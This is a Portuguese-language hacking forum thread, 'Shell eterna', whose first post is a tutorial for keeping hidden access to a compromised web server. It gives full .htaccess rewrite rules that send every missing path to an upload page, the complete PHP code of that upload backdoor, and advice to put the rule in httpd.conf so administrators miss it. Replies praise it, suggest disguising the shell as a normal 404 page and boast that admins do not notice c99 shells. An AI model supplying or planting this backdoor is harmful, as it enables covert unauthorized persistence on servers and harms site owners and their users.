Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Shell eterna

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Shell eterna

    Essa técnica é dahora.

    Vamos la.. como não perder acesso no servidor depois do site do Mysql Trigger...

    Vamos la configurando o .htaccess

    Edite ou crie o arquivo .htaccess com este código...

    Código:
    RewriteEngine on
    
    RewriteBase /
    
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule (.*) up.php [L]
    faça o upload do arquivo up.php na pasta raiz que esta o .htaccess ou crie um diretório...
    Vamos la assim estamos configurando o error 404 do servidor para ficar com nosso up hahah
    código go up.php

    Código:
    <html>
    <body>
    <?php
    
    echo '<b><br><br>'.php_uname().'<br></b>';
    
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    
    if( $_POST['_upl'] == "Upload" ) {
    
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yes</b><br><br>'; }
    
        else { echo '<b>No </b><br><br>'; }
    
    }
    
    ?>
    </body>
    </html>
    nisso você fez a configuração para o up.php ser o arquivo de erro ai sua shell vai ficar em qualquer lugar do servidor nesse caso seu upload ou seja

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <- faca seu upload

    e nisso qualquer coisa depois da barra vai da seu upload, se você tiver acesso root edite o httpd.conf no caso do apache, pra mim isso e legal demais.

    Importante: Edite o httpd.conf, 90% dos administradores não vão se ligar nunca.

    sou doido mesmo né? vlw.
    Last edited by Bruno_menor; 17-04-2014, 00:12.

  • Font Size
    #2
    Boa dica kara, e vc é doido mesmo

    Se me bloqueiam de um lado, eu me infiltro do outro
    Eu sou pior que um rato eu entro pelo esgoto
    Voltei de preto pro combate sem medo de apanhar
    Eu não sou Jesus Cristo então vou revidar!





    É meu fan? Use minha fan bar




    A nossa maior glória não reside no fato de nunca cairmos, mas sim em levantarmo-nos sempre depois de cada queda.

    Comment


    • Font Size
      #3
      Muito Bom!!!!, muito legal mesmo, mas se o ADMIN pegar esse código no HTACESS bye bye! agora se fosse no httpd.conf seria bem melhor...
      sigpic


      Patati Patacula, la vem o pato para ver o que Ha!!

      Comment


      • Font Size
        #4
        @Sh0rtKiller

        No caso do up.php a interface é diferente do normal do erro que tem que dar, agora no caso se ao invés do up.php colocar a 404 shell que tem o mesmo interface do erro padrão, ai iria ficar lindo

        Comment


        • Font Size
          #5
          Postado Originalmente por andreol263 Ver Post
          Muito Bom!!!!, muito legal mesmo, mas se o ADMIN pegar esse código no HTACESS bye bye! agora se fosse no httpd.conf seria bem melhor...
          Normalmente eles nem sabem o que é Htaccess, tem uns admin que só instalam o wordpress lá e pronto, alguns mesmo que upe uma shell c99 eles não iriam notar, mas bom trabalho shr0t, parabéns.
          Yes, I am a criminal. My crime is that of curiosity. My crime is
          that of judging people by what they say and think, not what they look like.
          My crime is that of outsmarting you, something that you will never forgive me
          for.

          I am a hacker, and this is my manifesto. You may stop this individual,
          but you can't stop us all... after all, we're all alike.

          Comment


          • Font Size
            #6
            Respondendo a voces primeiroo

            @sn3f4

            voce tem muita razao, acredita que depois que eu fiz o tutorial eu pensei em fazer com a shell 404? viajo ne?

            @Merce doi mesmo e tenso

            @cr4t3r obrigadoo

            Comment


            • Font Size
              #7
              eltie hacker é outra coisa ne kkkkk vlw s2
              sigpicToda verdade passa por três estágios. Primeiramente, é ridicularizada. Em segundo lugar, é violentamente confrontada. Por último, torna-se aceita como evidência

              Comment

              X
              Working...
              X